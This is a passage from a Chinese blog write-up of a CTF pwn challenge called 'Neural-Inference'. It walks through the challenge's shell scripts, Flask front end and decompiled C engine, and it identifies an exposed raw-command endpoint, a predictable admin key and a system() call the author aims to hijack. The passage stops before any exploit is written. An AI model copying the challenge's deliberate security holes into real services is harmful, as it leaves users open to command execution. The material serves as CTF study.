数字中国-pwn-Neural-Inference

前言

ai混战啊,题目基本上放出来10分钟就开始有解,随后被打烂,但是pwn的这一道题目还是很新颖的,虽然ai混战,但是还是希望自己能尽可能地去古法手搓一下这一道题目的逆向部分吧,这里写个博客记录下自己的古法手搓过程。

正文

分析

拿到附件,给了一个docker,照例先每一个文件都看一下

init.sh

docker以root 权限运行的 engine,和低权限运行的 Flask 前端,二者通过本地 socket 通信。pwn题目嘛,所以大胆猜测一下真正需要我们利用的点还是在 root 的 engine 手里

#!/bin/bash
# NeuralChat initialization script
# Engine runs as root, Flask runs as neuralchat (privilege separation)

echo "[*] Starting NeuralChat services..."

# Start the C backend engine as root (needed for flag access via VNM/system())
/opt/neuralchat/bin/engine &
ENGINE_PID=$!
echo "[*] Engine started with PID $ENGINE_PID (root)"

# Wait for socket to be ready
for i in $(seq 1 10); do
    if [ -S /opt/neuralchat/run/engine.sock ]; then
        echo "[*] Engine socket ready"
        break
    fi
    sleep 0.5
done

# Ensure socket is accessible by neuralchat user
chmod 777 /opt/neuralchat/run/engine.sock

# Start the Flask frontend as unprivileged neuralchat user
echo "[*] Starting Flask frontend as neuralchat user..."
cd /opt/neuralchat/frontend
exec su -s /bin/bash neuralchat -c "python3 /opt/neuralchat/frontend/app.py"

validate.sh

对模型文件进行一个简单的校验,确认文件的格式是NCML格式

#!/bin/bash

# 从命令行第一个参数读取待校验的模型文件路径。
# 这个脚本的调用方式通常类似于:
#   validate.sh /path/to/model.ncm
MODEL_PATH="$1"

# 如果没有传入参数,说明调用方式不正确,直接打印用法并退出。
# -z 用于判断字符串是否为空。
if [ -z "$MODEL_PATH" ]; then
    echo "Usage: validate.sh <model_path>"
    exit 1
fi

# 确认传入的路径对应的是一个实际存在的普通文件。
# 如果文件不存在,后续的读取操作没有意义,因此立即报错退出。
if [ ! -f "$MODEL_PATH" ]; then
    echo "Error: Model file not found: $MODEL_PATH"
    exit 1
fi

# 读取文件开头的前 4 个字节。
# 这里利用 head -c 4 提取“文件魔数”或“文件签名”,
# 用它来粗略判断这个文件是不是期望的 NCML 格式。
MAGIC=$(head -c 4 "$MODEL_PATH")

# 检查前 4 个字节是否等于字符串 NCML。
# 如果匹配,则认为文件头格式正确;否则判定为非法格式。
# 注意:这只是非常弱的校验,只验证了 magic,没有校验长度、版本、偏移等字段。
if [ "$MAGIC" = "NCML" ]; then
    echo "Valid NCML format"
else
    echo "Invalid format"
    exit 1
fi

# 能执行到这里,说明:
# 1. 用户传入了参数
# 2. 文件存在
# 3. 文件前 4 个字节是 NCML
# 因此脚本将该模型视为“校验通过”。
echo "Model validation passed: $MODEL_PATH"

# 以退出码 0 结束,表示脚本成功执行。
exit 0

gen_model.py

该脚本实现了一个最小化的 NCML 模型文件生成器,其核心功能是按照预定义的二进制格式构造并写出一个合法的 .ncm 文件(NCML(NeuralChat Model)是一种用于 NeuralChat 系统的自定义二进制模型文件格式)。整个文件由三部分组成:固定长度的 Header、可变长度的 Metadata,以及用于存储模型数据的 Data 区域。

在结构上,Header 用于标识文件类型(通过 magic 字符串 “NCML”)并提供关键偏移信息(如 metadata 和 data 的起始位置);Metadata 则采用键值对形式组织,每个条目包含类型标识、数据长度及实际内容,用于描述模型的基本属性(如名称、版本、作者等);Data 区域则存储实际模型数据(此处为占位用的伪权重数据)。

#!/usr/bin/env python3
"""Generate default NCML model file for NeuralChat."""

import struct
import os

MODEL_PATH = "/opt/neuralchat/data/models/active.ncm"

def write_ncml(path):
    metadata_entries = [
        (0x01, b"neuralchat-7b"),          # model_name
        (0x02, b"2.1.0"),                   # version
        (0x03, b"NeuralChat Team"),         # author
        (0x04, b"Conversational AI model"), # description
        (0x05, b"/opt/neuralchat/plugins/validate.sh /opt/neuralchat/data/models/active.ncm"), # pre_load_hook
    ]

    # Build metadata section
    meta_data = struct.pack('<H', len(metadata_entries))
    for key_type, value in metadata_entries:
        meta_data += struct.pack('<B', key_type)
        meta_data += struct.pack('<H', len(value))
        meta_data += value

    # Fake model weights (just random-looking data)
    weights = b'\x00' * 256

    # Build data section
    data_section = struct.pack('<I', len(weights)) + weights

    # Header: magic(4) + version(4) + header_size(4) + meta_offset(4) + data_offset(4) = 20 bytes
    header_size = 20
    meta_offset = header_size
    data_offset = meta_offset + len(meta_data)

    header = b'NCML'
    header += struct.pack('<I', 1)            # version
    header += struct.pack('<I', header_size)
    header += struct.pack('<I', meta_offset)
    header += struct.pack('<I', data_offset)

    with open(path, 'wb') as f:
        f.write(header)
        f.write(meta_data)
        f.write(data_section)

    print(f"[*] Default model written to {path}")

if __name__ == '__main__':
    os.makedirs(os.path.dirname(MODEL_PATH), exist_ok=True)
    write_ncml(MODEL_PATH)

app.py

这里前端的index.php就不看了,直接看API 网关的处理逻辑程序,有前后端开发基础的话这个文件还是比较好看的

"""
NeuralChat Frontend - Flask web application for NeuralChat LLM service.
Proxies requests to the C backend engine via Unix socket.
"""

import os
import sys
import json
import struct
import socket
import base64
import time
from flask import Flask, request, jsonify, send_file, render_template, abort

app = Flask(__name__)


ENGINE_SOCKET = "/opt/neuralchat/run/engine.sock"
DOWNLOAD_DIR  = "/opt/neuralchat/downloads"
KNOWLEDGE_DIR = "/opt/neuralchat/data/knowledge"

CMD_NEW_SESSION   = 0x01
CMD_CHAT          = 0x02
CMD_LIST_SESSIONS = 0x03
CMD_EXPORT        = 0x04
CMD_IMPORT        = 0x05
CMD_UPLOAD_KNOW   = 0x06
CMD_LIST_KNOW     = 0x07
CMD_MODEL_INFO    = 0x08
CMD_STATUS        = 0x09
CMD_ADMIN         = 0xFF


def send_to_engine(command, payload=b''):
    """Send a command to the C backend engine via Unix socket."""
    try:
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect(ENGINE_SOCKET)

        total_len = 5 + len(payload)
        msg = struct.pack('<I', total_len) + bytes([command]) + payload
        sock.sendall(msg)

        header = b''
        while len(header) < 4:
            chunk = sock.recv(4 - len(header))
            if not chunk:
                break
            header += chunk

        if len(header) < 4:
            sock.close()
            return None, "Connection error"

        resp_len = struct.unpack('<I', header)[0]
        body = b''
        remaining = resp_len - 4
        while len(body) < remaining:
            chunk = sock.recv(remaining - len(body))
            if not chunk:
                break
            body += chunk

        sock.close()

        if len(body) < 1:
            return None, "Empty response"

        status = body[0]
        data = body[1:]
        return status, data

    except Exception as e:
        return None, str(e)



@app.route('/')
def index():
    return render_template('index.html')


@app.route('/api/status')
def api_status():
    """Get engine status - exposes PID for monitoring."""
    status, data = send_to_engine(CMD_STATUS)
    if status == 0x00:
        return jsonify(json.loads(data.decode('utf-8', errors='replace')))
    return jsonify({"error": "Engine unavailable"}), 503


@app.route('/api/session/new', methods=['POST'])
def new_session():
    status, data = send_to_engine(CMD_NEW_SESSION)
    if status == 0x00 and len(data) >= 4:
        sid = struct.unpack('<I', data[:4])[0]
        return jsonify({"session_id": sid})
    return jsonify({"error": "Failed to create session"}), 500


@app.route('/api/chat', methods=['POST'])
def chat():
    body = request.get_json()
    if not body or 'session_id' not in body or 'message' not in body:
        return jsonify({"error": "Missing session_id or message"}), 400

    sid = int(body['session_id'])
    msg = body['message'].encode('utf-8')

    payload = struct.pack('<I', sid) + msg
    status, data = send_to_engine(CMD_CHAT, payload)

    if status == 0x00:
        return jsonify({"response": data.decode('utf-8', errors='replace')})
    return jsonify({"error": data.decode('utf-8', errors='replace')}), 400


@app.route('/api/sessions')
def list_sessions():
    status, data = send_to_engine(CMD_LIST_SESSIONS)
    if status == 0x00:
        return jsonify(json.loads(data.decode('utf-8', errors='replace')))
    return jsonify([])


@app.route('/api/export', methods=['POST'])
def export_session():
    body = request.get_json()
    if not body or 'session_id' not in body:
        return jsonify({"error": "Missing session_id"}), 400

    sid = int(body['session_id'])
    payload = struct.pack('<I', sid)
    status, data = send_to_engine(CMD_EXPORT, payload)

    if status == 0x00:
        filename = data.decode('utf-8', errors='replace')
        return jsonify({"download_url": f"/api/download?file={filename}"})
    return jsonify({"error": "Export failed"}), 500


@app.route('/api/download')
def download_file():
    filename = request.args.get('file', '')
    if not filename:
        return "Missing file parameter", 400

    filepath = os.path.join(DOWNLOAD_DIR, filename)

    if not filepath.startswith(DOWNLOAD_DIR):
        return "Access denied", 403

    if not os.path.exists(filepath):
        return "File not found", 404

    return send_file(filepath)


@app.route('/api/knowledge/upload', methods=['POST'])
def upload_knowledge():
    if 'file' not in request.files:
        return jsonify({"error": "No file provided"}), 400

    f = request.files['file']
    filename = f.filename
    content = f.read()

    name_bytes = filename.encode('utf-8')
    payload = struct.pack('<H', len(name_bytes)) + name_bytes
    payload += struct.pack('<I', len(content)) + content

    status, data = send_to_engine(CMD_UPLOAD_KNOW, payload)
    if status == 0x00:
        path = data.decode('utf-8', errors='replace')
        return jsonify({"status": "uploaded", "filename": filename, "path": path})
    return jsonify({"error": "Upload failed"}), 500


@app.route('/api/knowledge/list')
def list_knowledge():
    status, data = send_to_engine(CMD_LIST_KNOW)
    if status == 0x00:
        return jsonify(json.loads(data.decode('utf-8', errors='replace')))
    return jsonify([])


@app.route('/api/model/info')
def model_info():
    status, data = send_to_engine(CMD_MODEL_INFO)
    if status == 0x00:
        return jsonify(json.loads(data.decode('utf-8', errors='replace')))
    return jsonify({"error": "Unavailable"}), 503


@app.route('/api/raw', methods=['POST'])
def raw_command():
    body = request.get_json()
    if not body or 'data' not in body:
        return jsonify({"error": "Missing data"}), 400

    try:
        raw_data = base64.b64decode(body['data'])
    except Exception:
        return jsonify({"error": "Invalid base64"}), 400

    if len(raw_data) < 1:
        return jsonify({"error": "Empty data"}), 400

    command = raw_data[0]
    payload = raw_data[1:]

    status, data = send_to_engine(command, payload)
    if status is not None:
        resp = bytes([status]) + data
        return jsonify({"data": base64.b64encode(resp).decode()})
    return jsonify({"error": str(data)}), 500



if __name__ == '__main__':
    os.makedirs(DOWNLOAD_DIR, exist_ok=True)
    os.makedirs(KNOWLEDGE_DIR, exist_ok=True)
    app.run(host='0.0.0.0', port=5000, debug=False)

send_to_engine函数

函数内容很简答,就是单纯的将payload给打包好发送给后端的engine程序,交互的格式是:msg = struct.pack('<I', total_len) + bytes([command]) + payload 算是一个自定义的RPC协议实现:

远程过程调用(Remote Procedure Call,RPC)是一种计算机通信协议。它允许一个计算机程序在另一台计算机上执行代码,而不需要程序员显式编写网络代码。RPC协议的实现可以使分布式计算更加容易和透明。

RPC协议的核心是一个客户端和一个服务端,它们可以运行在不同的机器上。客户端调用服务端的某个函数,服务端执行该函数并返回结果。客户端可以像调用本地函数一样调用远程函数,而不需要知道底层的网络细节。

RPC协议的实现通常包括以下几个步骤:

  1. 定义接口。客户端和服务端需要共同定义一套接口,描述函数的输入参数和返回值。

  2. 生成代理代码。客户端需要生成一个代理,它可以将函数调用转换成网络消息,并将结果返回给客户端。

  3. 序列化和反序列化。客户端和服务端之间需要将数据序列化成网络字节流,以便进行传输。收到数据后,需要将其反序列化成可读的数据格式。

  4. 网络传输。客户端和服务端之间需要进行网络传输,以便进行数据交换。

  5. 调用远程函数。客户端通过代理调用服务端的函数,服务端执行该函数并返回结果。

  6. 返回结果。服务端将执行结果序列化后发送给客户端,客户端将其反序列化成可读的数据格式。

def send_to_engine(command, payload=b''):
    """Send a command to the C backend engine via Unix socket."""
    try:
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect(ENGINE_SOCKET)

        total_len = 5 + len(payload)
        msg = struct.pack('<I', total_len) + bytes([command]) + payload
        sock.sendall(msg)

        header = b''
        while len(header) < 4:
            chunk = sock.recv(4 - len(header))
            if not chunk:
                break
            header += chunk

        if len(header) < 4:
            sock.close()
            return None, "Connection error"

        resp_len = struct.unpack('<I', header)[0]
        body = b''
        remaining = resp_len - 4
        while len(body) < remaining:
            chunk = sock.recv(remaining - len(body))
            if not chunk:
                break
            body += chunk

        sock.close()

        if len(body) < 1:
            return None, "Empty response"

        status = body[0]
        data = body[1:]
        return status, data

    except Exception as e:
        return None, str(e)

api_status函数

向后端 engine 发送“状态查询命令”,并把返回结果转换成 JSON 给前端。

@app.route('/api/status')
def api_status():
    """Get engine status - exposes PID for monitoring."""
    status, data = send_to_engine(CMD_STATUS)
    if status == 0x00:
        return jsonify(json.loads(data.decode('utf-8', errors='replace')))
    return jsonify({"error": "Engine unavailable"}), 503

new_session函数

创建新会话(session)的接口,向后端 engine 请求一个新的“聊天上下文 ID”。

@app.route('/api/session/new', methods=['POST'])
def new_session():
    status, data = send_to_engine(CMD_NEW_SESSION)
    if status == 0x00 and len(data) >= 4:
        sid = struct.unpack('<I', data[:4])[0]
        return jsonify({"session_id": sid})
    return jsonify({"error": "Failed to create session"}), 500

chat函数

负责把用户输入发送给后端 engine,并返回模型的回复。

@app.route('/api/chat', methods=['POST'])
def chat():
    body = request.get_json()
    if not body or 'session_id' not in body or 'message' not in body:
        return jsonify({"error": "Missing session_id or message"}), 400

    sid = int(body['session_id'])
    msg = body['message'].encode('utf-8')

    payload = struct.pack('<I', sid) + msg
    status, data = send_to_engine(CMD_CHAT, payload)

    if status == 0x00:
        return jsonify({"response": data.decode('utf-8', errors='replace')})
    return jsonify({"error": data.decode('utf-8', errors='replace')}), 400

list_sessions函数

用于获取当前系统中所有会话列表,并以 JSON 格式返回。

@app.route('/api/sessions')
def list_sessions():
    status, data = send_to_engine(CMD_LIST_SESSIONS)
    if status == 0x00:
        return jsonify(json.loads(data.decode('utf-8', errors='replace')))
    return jsonify([])

export_session函数

把某个聊天 session 导出成文件,并提供下载地址。

@app.route('/api/export', methods=['POST'])
def export_session():
    body = request.get_json()
    if not body or 'session_id' not in body:
        return jsonify({"error": "Missing session_id"}), 400

    sid = int(body['session_id'])
    payload = struct.pack('<I', sid)
    status, data = send_to_engine(CMD_EXPORT, payload)

    if status == 0x00:
        filename = data.decode('utf-8', errors='replace')
        return jsonify({"download_url": f"/api/download?file={filename}"})
    return jsonify({"error": "Export failed"}), 500

download_file函数

根据用户提供的文件名,从服务器下载目录中读取文件并返回。

@app.route('/api/download')
def download_file():
    filename = request.args.get('file', '')
    if not filename:
        return "Missing file parameter", 400

    filepath = os.path.join(DOWNLOAD_DIR, filename)

    if not filepath.startswith(DOWNLOAD_DIR):
        return "Access denied", 403

    if not os.path.exists(filepath):
        return "File not found", 404

    return send_file(filepath)

list_knowledge函数和model_info函数

这两个接口都是“只读查询接口”,通过向后端 engine 发送命令,获取 JSON 数据并返回给前端。分别查询知识库列表和模型信息列表

@app.route('/api/knowledge/list')
def list_knowledge():
    status, data = send_to_engine(CMD_LIST_KNOW)
    if status == 0x00:
        return jsonify(json.loads(data.decode('utf-8', errors='replace')))
    return jsonify([])


@app.route('/api/model/info')
def model_info():
    status, data = send_to_engine(CMD_MODEL_INFO)
    if status == 0x00:
        return jsonify(json.loads(data.decode('utf-8', errors='replace')))
    return jsonify({"error": "Unavailable"}), 503

raw_command函数

这个接口允许客户端直接构造底层二进制协议,绕过所有高级 API,直接与后端 engine 通信。也是最危险的函数。

这个接口开发前后端应该都知道这个接口是作为测试项目用的,实际上使用的时候不能把这个接口暴露出来,这里没有删去这个api,应该就是通过这个接口来进行我们需要进行的操作。

@app.route('/api/raw', methods=['POST'])
def raw_command():
    body = request.get_json()
    if not body or 'data' not in body:
        return jsonify({"error": "Missing data"}), 400

    try:
        raw_data = base64.b64decode(body['data'])
    except Exception:
        return jsonify({"error": "Invalid base64"}), 400

    if len(raw_data) < 1:
        return jsonify({"error": "Empty data"}), 400

    command = raw_data[0]
    payload = raw_data[1:]

    status, data = send_to_engine(command, payload)
    if status is not None:
        resp = bytes([status]) + data
        return jsonify({"data": base64.b64encode(resp).decode()})
    return jsonify({"error": str(data)}), 500

engine程序

程序没有抹去符号表

main函数

函数大致做了这样的操作:启动 engine 进程,初始化日志和全局状态,加载默认模型,在 /opt/neuralchat/run/engine.sock 上监听客户端连接,并将每个连接交给 handle_connection() 处理。

这里面的derive_admin_key(g_pid, g_start_time, g_pwn); 生成一个管理相关的key,并存在g_pwn的全局区域,且由于程序给了S盒的内容,所以这个key我们是可以预测出来的。

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rdx
  __int64 v4; // rcx
  __int64 v5; // r8
  __int64 v6; // r9
  __int64 g_start_time; // rsi
  __int64 v8; // rdx
  __int64 v9; // rcx
  __int64 v10; // r8
  __int64 v11; // r9
  __int64 v12; // rdx
  __int64 v13; // rcx
  __int64 v14; // r8
  __int64 v15; // r9
  int *p_errnum_3; // rax
  char *v17; // rax
  __int64 v18; // rdx
  __int64 v19; // rcx
  __int64 v20; // r8
  __int64 v21; // r9
  int *p_errnum_2; // rax
  char *v24; // rax
  __int64 v25; // rdx
  __int64 v26; // rcx
  __int64 v27; // r8
  __int64 v28; // r9
  __int64 v29; // rdx
  __int64 v30; // rcx
  __int64 v31; // r8
  __int64 v32; // r9
  int *p_errnum_1; // rax
  char *v34; // rax
  __int64 v35; // rdx
  __int64 v36; // rcx
  __int64 v37; // r8
  __int64 v38; // r9
  void *_opt_neuralchat_run_engine.sock; // rsi
  __int64 v40; // rdx
  __int64 v41; // rcx
  __int64 v42; // r8
  __int64 v43; // r9
  int *p_errnum; // rax
  __int64 v45; // rdx
  __int64 v46; // rcx
  __int64 v47; // r8
  __int64 v48; // r9
  int fd; // [rsp+18h] [rbp-98h]
  int fd_1; // [rsp+1Ch] [rbp-94h]
  _QWORD optval[2]; // [rsp+20h] [rbp-90h] BYREF
  struct sockaddr s; // [rsp+30h] [rbp-80h] BYREF
  unsigned __int64 v53; // [rsp+A8h] [rbp-8h]

  v53 = __readfsqword(0x28u);
  LODWORD(g_pid) = getpid();
  ::g_start_time = time(0);
  g_logfile = fopen("/opt/neuralchat/logs/engine.log", "a");
  if ( !g_logfile )
    g_logfile = (FILE *)edata;
  engine_log("NeuralChat Engine starting, PID=%d", (unsigned int)g_pid, v3, v4, v5, v6, argv);
  g_start_time = ::g_start_time;
  derive_admin_key(g_pid, ::g_start_time, g_pwn);// 生成一个管理相关的key,并存在g_pwn的全局区域
  engine_log("Admin key derived", g_start_time, v8, v9, v10, v11);
  if ( (unsigned int)load_ncml_model("/opt/neuralchat/data/models/active.ncm") )// 尝试加载默认模型文件
  {
    engine_log("Warning: No default model loaded, using fallback", g_start_time, v12, v13, v14, v15);
    strncpy(g_model, "neuralchat-7b", 0x80u);
    strncpy(dest, "2.1.0", 0x20u);
    strncpy(dest_0, "NeuralChat Team", 0x40u);
    strncpy(dest_1, "Default conversational model", 0x100u);
    model_able = 1;
  }
  signal(2, (__sighandler_t)sig_handler);
  signal(15, (__sighandler_t)sig_handler);
  signal(13, (__sighandler_t)((char *)&dword_0 + 1));// 注册信号量
  unlink("/opt/neuralchat/run/engine.sock");    // 删除旧 socket,创建新的 Unix socket,防止残留
  fd = socket(1, 1, 0);
  if ( fd >= 0 )
  {
    memset(&s, 0, 0x6Eu);
    s.sa_family = 1;
    strncpy(s.sa_data, "/opt/neuralchat/run/engine.sock", 0x6Bu);
    if ( bind(fd, &s, 0x6Eu) >= 0 )
    {
      chmod("/opt/neuralchat/run/engine.sock", 511u);// 将socket的文件设置为所有用户可读可写可执行
      if ( listen(fd, 16) >= 0 )
      {
        _opt_neuralchat_run_engine.sock = (void *)"/opt/neuralchat/run/engine.sock";
        engine_log(
          "NeuralChat Engine ready, listening on %s",
          (__int64)"/opt/neuralchat/run/engine.sock",
          v29,
          v30,
          v31,
          v32);
        while ( g_running )
        {
          _opt_neuralchat_run_engine.sock = 0;
          fd_1 = accept(fd, 0, 0);
          if ( fd_1 >= 0 )
          {
            optval[0] = 5;
            optval[1] = 0;
            _opt_neuralchat_run_engine.sock = &dword_0 + 1;
            setsockopt(fd_1, 1, 20, optval, 0x10u);
            handle_connection(fd_1);            // 实际处理函数
            close(fd_1);
          }
          else if ( *__errno_location() != 4 )
          {
            p_errnum = __errno_location();
            _opt_neuralchat_run_engine.sock = strerror(*p_errnum);
            engine_log("Accept failed: %s", (__int64)_opt_neuralchat_run_engine.sock, v45, v46, v47, v48);
          }
        }
        engine_log("NeuralChat Engine shutting down", (__int64)_opt_neuralchat_run_engine.sock, v40, v41, v42, v43);
        close(fd);
        unlink("/opt/neuralchat/run/engine.sock");
        if ( g_logfile )
        {
          if ( g_logfile != (FILE *)edata )
            fclose(g_logfile);
        }
        return 0;
      }
      else
      {
        p_errnum_1 = __errno_location();
        v34 = strerror(*p_errnum_1);            // 从内部数组中搜索错误号errnum,并返回一个指向错误消息字符串的指针,生成的错误字符串取决于开发平台和编译器。
        engine_log("Failed to listen: %s", (__int64)v34, v35, v36, v37, v38);
        close(fd);
        return 1;
      }
    }
    else
    {
      p_errnum_2 = __errno_location();
      v24 = strerror(*p_errnum_2);
      engine_log("Failed to bind socket: %s", (__int64)v24, v25, v26, v27, v28);
      close(fd);
      return 1;
    }
  }
  else
  {
    p_errnum_3 = __errno_location();
    v17 = strerror(*p_errnum_3);
    engine_log("Failed to create socket: %s", (__int64)v17, v18, v19, v20, v21);
    return 1;
  }
}

handle_connection函数

处理我们传入的msg,并依据commond来决定进入哪一个逻辑处理函数。稍微逆向和结合我们之前得到的gen_model.py文件就可以知道这是一个本地假“神经网络引擎”服务,聊天能力是规则匹配

unsigned __int64 __fastcall handle_connection(unsigned int fd)
{
  unsigned int buf_1; // [rsp+14h] [rbp-202Ch]
  signed int i; // [rsp+18h] [rbp-2028h]
  signed int i_1; // [rsp+1Ch] [rbp-2024h]
  unsigned int payload; // [rsp+20h] [rbp-2020h]
  int already_read_bytes; // [rsp+24h] [rbp-201Ch]
  unsigned int buf; // [rsp+30h] [rbp-2010h] BYREF
  unsigned __int8 commond; // [rsp+34h] [rbp-200Ch]
  int v9[2]; // [rsp+35h] [rbp-200Bh] BYREF
  unsigned __int64 v10; // [rsp+2038h] [rbp-8h]

  v10 = __readfsqword(0x28u);
  if ( read(fd, &buf, 4u) != 4 )                // 依据之前逆向得到的的消息的结构体,这里先读入消息的总长度
    return v10 - __readfsqword(0x28u);
  buf_1 = buf;
  if ( buf <= 4 || buf > 0x2000 )
    return v10 - __readfsqword(0x28u);
  i_1 = buf - 4;
  for ( i = 0; i < i_1; i += already_read_bytes )// 循环读取,将commond和payload都读入进去
  {
    already_read_bytes = read(fd, (char *)&buf + i + 4, (unsigned int)(i_1 - i));
    if ( already_read_bytes <= 0 )
      return v10 - __readfsqword(0x28u);
  }
  payload = buf_1 - 5;                          // 获取我们的payload
  if ( commond > 9u )
  {
    if ( commond == 0xFF )
    {
      handle_admin(fd, (unsigned int *)v9, payload);
      return v10 - __readfsqword(0x28u);
    }
LABEL_22:
    send_response(fd, 1, "Unknown command", 0xFu);
    return v10 - __readfsqword(0x28u);
  }
  if ( !commond )
    goto LABEL_22;
  switch ( commond )
  {
    case 1u:
      handle_new_session(fd);
      break;
    case 2u:
      handle_chat(fd, v9, payload);
      break;
    case 3u:
      handle_list_sessions(fd);
      break;
    case 4u:
      handle_export(fd, (unsigned int *)v9, payload);
      break;
    case 6u:
      handle_upload_knowledge(fd, (unsigned __int16 *)v9, payload);
      break;
    case 7u:
      handle_list_knowledge(fd);
      break;
    case 8u:
      handle_model_info(fd);
      break;
    case 9u:
      handle_status(fd);
      break;
    default:
      goto LABEL_22;
  }
  return v10 - __readfsqword(0x28u);
}

handle_admin函数

这里面有一个handle_admin的函数:

unsigned __int64 __fastcall handle_admin(int fd, unsigned int *payload, unsigned int payload_length)
{
  __int64 v3; // rdx
  __int64 v4; // rcx
  __int64 v5; // r8
  __int64 v6; // r9
  __int64 v7; // rdx
  __int64 v8; // rcx
  __int64 v9; // r8
  __int64 v10; // r9
  int g_session_count; // ebx
  time_t v12; // rax
  unsigned int n0x1FF_1; // eax
  __int64 v14; // rdx
  __int64 v15; // rcx
  __int64 v16; // r8
  __int64 v17; // r9
  unsigned int n0x1FF_2; // eax
  __int64 v19; // rcx
  __int64 v20; // r8
  __int64 v21; // r9
  __int64 n4096; // rax
  __int64 v23; // rdx
  __int64 v24; // rcx
  __int64 v25; // r8
  __int64 v26; // r9
  unsigned __int8 v28; // [rsp+1Fh] [rbp-1061h]
  unsigned int n0x1FF; // [rsp+24h] [rbp-105Ch]
  unsigned int n_2; // [rsp+28h] [rbp-1058h]
  unsigned int n; // [rsp+2Ch] [rbp-1054h]
  unsigned int n_4; // [rsp+30h] [rbp-1050h]
  unsigned int n_1; // [rsp+34h] [rbp-104Ch]
  char *src; // [rsp+40h] [rbp-1040h]
  FILE *stream; // [rsp+48h] [rbp-1038h]
  char s[24]; // [rsp+60h] [rbp-1020h] BYREF
  unsigned __int64 v37; // [rsp+1068h] [rbp-18h]

  v37 = __readfsqword(0x28u);
  if ( payload_length > 0x24 )
  {
    v28 = *((_BYTE *)payload + 4);
    src = (char *)payload + 0x25;
    n0x1FF = payload_length - 37;
    if ( verify_admin_token(*payload, v28, (char *)payload + 0x25, payload_length - 37, (char *)payload + 5) )
    {
      engine_log("Admin command authenticated: sub_cmd=0x%02x", v28, v3, v4, v5, v6);
      switch ( v28 )
      {
        case 1u:
          g_session_count = ::g_session_count;
          v12 = time(0);
          n_1 = snprintf(
                  s,
                  0x400u,
                  "{\"admin\":true,\"pid\":%d,\"start_time\":%ld,\"uptime\":%ld,\"sessions\":%d,\"model\":\"%s\",\"versio"
                  "n\":\"2.1.0\",\"log_file\":\"%s\"}",
                  g_pid,
                  g_start_time,
                  v12 - g_start_time,
                  g_session_count,
                  g_model,
                  "/opt/neuralchat/logs/engine.log");
          send_response(fd, 0, s, n_1);
          break;
        case 2u:
          if ( n0x1FF )
          {
            n0x1FF_1 = n0x1FF;
            if ( n0x1FF > 0x1FF )
              n0x1FF_1 = 511;
            n_4 = n0x1FF_1;
            memcpy(s, src, n0x1FF_1);
            s[n_4] = 0;
            engine_log("Admin reloading model from: %s", (__int64)s, v14, v15, v16, v17);
            if ( (unsigned int)load_ncml_model(s) )
              send_response(fd, 1, "Model load failed", 0x11u);
            else
              send_response(fd, 0, "Model reloaded", 0xEu);
          }
          else
          {
            send_response(fd, 1, "No model path", 0xDu);
          }
          break;
        case 3u:
          if ( n0x1FF )
          {
            n0x1FF_2 = n0x1FF;
            if ( n0x1FF > 0x3FF )
              n0x1FF_2 = 1023;
            n = n0x1FF_2;
            memcpy(
              g_system_prompt,                  // "You are NeuralChat, a helpful AI assistant."
              src,
              n0x1FF_2);
            *((_BYTE *)g_system_prompt + n) = 0;// "You are NeuralChat, a helpful AI assistant."
            engine_log(
              "System prompt updated",
              (__int64)src,
              (__int64)g_system_prompt,         // "You are NeuralChat, a helpful AI assistant."
              v19,
              v20,
              v21);
            send_response(fd, 0, "Prompt updated", 0xEu);
          }
          else
          {
            send_response(fd, 1, "No prompt", 9u);
          }
          break;
        case 4u:
          stream = fopen("/opt/neuralchat/logs/engine.log", "r");
          if ( stream )
          {
            fseek(stream, 0, 2);
            n4096 = ftell(stream);
            if ( n4096 < 4096 )
              n4096 = 4096;
            fseek(stream, n4096 - 4096, 0);
            n_2 = fread(s, 1u, 0x1000u, stream);
            fclose(stream);
            send_response(fd, 0, s, n_2);
          }
          else
          {
            send_response(fd, 1, "No log file", 0xBu);
          }
          break;
        case 5u:
          engine_log("Admin running diagnostics via VNM", v28, v7, v8, v9, v10);
          if ( (unsigned int)execute_vnm(src, n0x1FF) )
          {
            send_response(fd, 1, "VNM execution failed", 0x14u);
          }
          else
          {
            engine_log(
              "Executing diagnostic script: %s",
              (__int64)aOptNeuralchatP_0,       // "/opt/neuralchat/plugins/diag.sh"
              v23,
              v24,
              v25,
              v26);
            system(aOptNeuralchatP_0);          // 存在任意命令执行的问题,想办法去篡改这个存储的值
            send_response(fd, 0, "Diagnostic complete", 0x13u);
          }
          break;
        default:
          send_response(fd, 1, "Unknown admin command", 0x15u);
          break;
      }
    }
    else
    {
      engine_log("Admin auth failed from client", v28, v3, v4, v5, v6);
      send_response(fd, 2, "Authentication failed", 0x15u);
    }
  }
  else
  {
    send_response(fd, 2, "Bad admin request", 0x11u);
  }
  return v37 - __readfsqword(0x28u);
}

进去这个handle_admin的函数,可以看到这个地方存在一个溢出,我们合理控制这里的v26为一个负数,就可以实现对system(aOptNeuralchatP_0)执行的命令的控制,但是问题就在于,这里的循环执行的switch不是执行完一个case就跳出,而是continue继续执行下去。

// 嵌套了一个小型的vm
__int64 __fastcall execute_vnm(_BYTE *src, unsigned int src_length)
{
  __int64 v2; // rdx
  __int64 v3; // rcx
  __int64 v4; // r8
  __int64 v5; // r9
  __int64 v6; // r8
  __int64 v7; // r9
  unsigned int start_src_length_1; // eax
  __int64 v9; // rdx
  unsigned int v11; // eax
  unsigned int v12; // eax
  unsigned int v13; // eax
  unsigned int v14; // eax
  unsigned int v15; // eax
  unsigned int v16; // eax
  unsigned int v17; // eax
  unsigned int v18; // eax
  unsigned int v19; // eax
  unsigned int v20; // eax
  unsigned int v21; // eax
  unsigned int v22; // eax
  unsigned int v23; // eax
  unsigned __int8 choice; // [rsp+1Eh] [rbp-72h]
  unsigned __int8 index10; // [rsp+1Fh] [rbp-71h]
  char v26; // [rsp+21h] [rbp-6Fh]
  unsigned __int8 index9; // [rsp+22h] [rbp-6Eh]
  unsigned __int8 index8; // [rsp+23h] [rbp-6Dh]
  unsigned __int8 index7; // [rsp+24h] [rbp-6Ch]
  unsigned __int8 index5; // [rsp+25h] [rbp-6Bh]
  unsigned __int8 index6; // [rsp+26h] [rbp-6Ah]
  unsigned __int8 n0xF_3; // [rsp+27h] [rbp-69h]
  unsigned __int8 index4; // [rsp+28h] [rbp-68h]
  unsigned __int8 index3; // [rsp+29h] [rbp-67h]
  unsigned __int8 index1; // [rsp+2Ah] [rbp-66h]
